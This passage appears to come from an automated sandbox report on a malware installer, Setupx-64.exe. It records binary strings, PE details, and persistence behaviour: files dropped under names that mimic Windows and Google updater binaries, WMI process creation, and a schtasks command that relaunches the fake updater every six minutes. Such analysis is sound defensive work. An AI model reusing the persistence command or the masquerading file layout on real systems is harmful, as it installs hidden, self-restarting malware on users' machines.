            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: iC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: lfons\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*Rea)G{pt source: upfc.exe, 00000014.00000002.2680004850.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: gC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Setupx-64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Setupx-64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Setupx-64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Setupx-64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Setupx-64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Setupx-64.exeFile created: C:\ComcontainerruntimeCrtNet\__tmp_rar_sfx_access_check_4128421Jump to behavior
            Source: Setupx-64.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CE28C push eax; ret 0_2_008CE2AA
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CED46 push ecx; ret 0_2_008CED59
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8186A04 push ds; retf 0017h20_2_00007FF7C8186A05
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8405159 push eax; retf 20_2_00007FF7C840515F
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C83F7967 push ebx; retf 20_2_00007FF7C83F796A
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C84069FE push eax; retf 20_2_00007FF7C84069FF
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C84069B3 push eax; retf 20_2_00007FF7C84069B4
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C840623A push eax; retf 20_2_00007FF7C840623E
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406A50 push eax; retf 20_2_00007FF7C8406A57
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406AEE push eax; retf 20_2_00007FF7C8406AEF
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406B95 push eax; retf 20_2_00007FF7C8406B99
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406BE3 push eax; retf 20_2_00007FF7C8406BE7
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406C4A push eax; retf 20_2_00007FF7C8406C51
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406CF1 push eax; retf 20_2_00007FF7C8406CF2
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C84064E7 push eax; retf 20_2_00007FF7C84064E8
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C840650E push eax; retf 20_2_00007FF7C840650F
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406D0A push eax; retf 20_2_00007FF7C8406D0E
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C84065DF push eax; retf 20_2_00007FF7C84065E0
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406DFA push eax; retf 20_2_00007FF7C8406DFB
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406E69 push eax; retf 20_2_00007FF7C8406E6A
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C84066E7 push eax; retf 20_2_00007FF7C84066EC
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406704 push eax; retf 20_2_00007FF7C8406708
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406EB4 push eax; retf 20_2_00007FF7C8406EB8
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8405786 push eax; retf 20_2_00007FF7C8405797
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C84067E4 push eax; retf 20_2_00007FF7C84067EE
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C84057E0 push eax; retf 20_2_00007FF7C84057E1
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8405804 push eax; retf 20_2_00007FF7C8405805
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406812 push eax; retf 20_2_00007FF7C840681B
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C84057AF push eax; retf 20_2_00007FF7C84057B8
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8405FAB push eax; retf 20_2_00007FF7C8405FAC
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C8406833 push eax; retf 20_2_00007FF7C8406837

            Persistence and Installation Behavior

            barindex
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exeJump to dropped file
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeJump to dropped file
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Recovery\fontdrvhost.exeJump to dropped file
            Source: C:\Users\user\Desktop\Setupx-64.exeFile created: C:\ComcontainerruntimeCrtNet\Blockruntime.exeJump to dropped file
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exeJump to dropped file
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Program Files (x86)\Google\Update\upfc.exeJump to dropped file
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exeJump to dropped file
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /f
            Source: C:\Users\user\Desktop\Setupx-64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
